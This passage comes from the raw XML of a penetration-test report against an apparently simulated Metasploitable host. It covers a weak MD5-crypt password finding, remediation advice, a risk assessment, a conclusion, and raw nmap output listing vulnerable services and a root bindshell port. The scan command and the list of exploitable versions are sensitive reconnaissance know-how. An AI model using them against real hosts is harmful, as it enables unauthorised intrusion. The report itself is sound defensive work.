        <w:t xml:space="preserve">This finding is independent of the three RCE vulnerabilities above: even in a hypothetical scenario where vsftpd, Samba, and UnrealIRCd were all fully patched, an attacker who obtained the password database through any other means (e.g., a future vulnerability, insider access, or backup exposure) would still be able to recover a significant proportion of user passwords within minutes. The recovered passwords also demonstrate poor password hygiene across accounts (sequential digits, dictionary words, and username-as-password), which would likely allow credential-stuffing attacks against other services reusing the same credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Migrate password storage from MD5-crypt to a modern, computationally expensive algorithm such as SHA-512 or bcrypt/Argon2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce a password policy requiring minimum length, complexity, and rejection of common/dictionary passwords.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement account lockout or rate-limiting on authentication attempts to slow online guessing (does not mitigate offline cracking once hashes are exposed, but reduces exposure risk overall).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Treat any exposure of /etc/shadow or equivalent credential stores as a critical incident requiring a full password reset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Overall Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The three confirmed critical vulnerabilities each resulted in complete, unauthenticated remote root compromise, representing the most severe possible outcome in a vulnerability assessment. A fourth, high-severity finding around weak credential hashing further compounds this risk. Several systemic issues contributed to this risk level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Outdated and unpatched software versions across multiple services (FTP, SMB, IRC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reliance on software distributed through channels that did not verify integrity, allowing backdoored versions to go undetected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lack of network segmentation or service-level access restriction, exposing all services to the same attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak legacy password hashing (MD5-crypt) observed in /etc/shadow, which would allow offline cracking even if the direct exploits above were remediated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If this were a production environment, the combined effect of these findings would allow a single unauthenticated attacker to gain full administrative control of the host within minutes, with no specialized skill required beyond running publicly available exploit modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">8. General Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a formal patch management process to ensure all services run current, supported versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the integrity (checksums/signatures) of all third-party software before installation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply network segmentation and firewall rules to limit service exposure to only what is operationally necessary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable or remove legacy, unnecessary services (Telnet, rsh, rexec, NIS) identified during reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce strong password policies and modern hashing algorithms (e.g., SHA-512/bcrypt) for all accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct regular vulnerability assessments and penetration tests to catch regressions before attackers do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This engagement successfully demonstrated the end-to-end VAPT methodology, from reconnaissance through exploitation to reporting, against a simulated vulnerable network. Three critical, unauthenticated remote-root vulnerabilities were identified and validated with proof-of-concept exploitation, each backed by command-line evidence of full system compromise. A fourth finding, obtained through offline password cracking, showed that the underlying credential storage itself is independently weak, reinforcing that patching individual services is necessary but not sufficient on its own.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exercise reinforces the importance of proactive vulnerability management: every finding in this report stemmed from outdated software, unverified distribution channels, or weak cryptographic practices that remained unaddressed. Organizations that adopt the recommendations above would eliminate all four attack paths identified in this assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A: Raw Nmap Scan Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: nmap -Pn -sV -sC -p- -T4 172.20.10.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PORT      STATE SERVICE     VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">21/tcp    open  ftp         vsftpd 2.3.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">23/tcp    open  telnet      Linux telnetd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">25/tcp    open  smtp        Postfix smtpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">53/tcp    open  domain      ISC BIND 9.4.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">111/tcp   open  rpcbind     2 (RPC #100000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">512/tcp   open  exec        netkit-rsh rexecd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">513/tcp   open  login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">514/tcp   open  tcpwrapped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1099/tcp  open  java-rmi    GNU Classpath grmiregistry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1524/tcp  open  bindshell   Metasploitable root shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2049/tcp  open  nfs         2-4 (RPC #100003)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2121/tcp  open  ftp         ProFTPD 1.3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3632/tcp  open  distccd     distccd v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">5900/tcp  open  vnc         VNC (protocol 3.3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">6000/tcp  open  X11         (access denied)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">6667/tcp  open  irc         UnrealIRCd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">6697/tcp  open  irc         UnrealIRCd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8)</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Nmap done: 1 IP address (1 host up) scanned in 138.29 seconds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Network VAPT Report — Harshit Vishwakarma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d8b7455c2d84bddc07b0a3ccab1140df43a82f.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e36e91d7d9045cf01b5acf38cd50d1188a6a8d95.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f45839d030fc6ce0c5616002f7aa3786ff1af98c.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2026-08-22T18:55:21.687Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-22T18:55:21.703Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>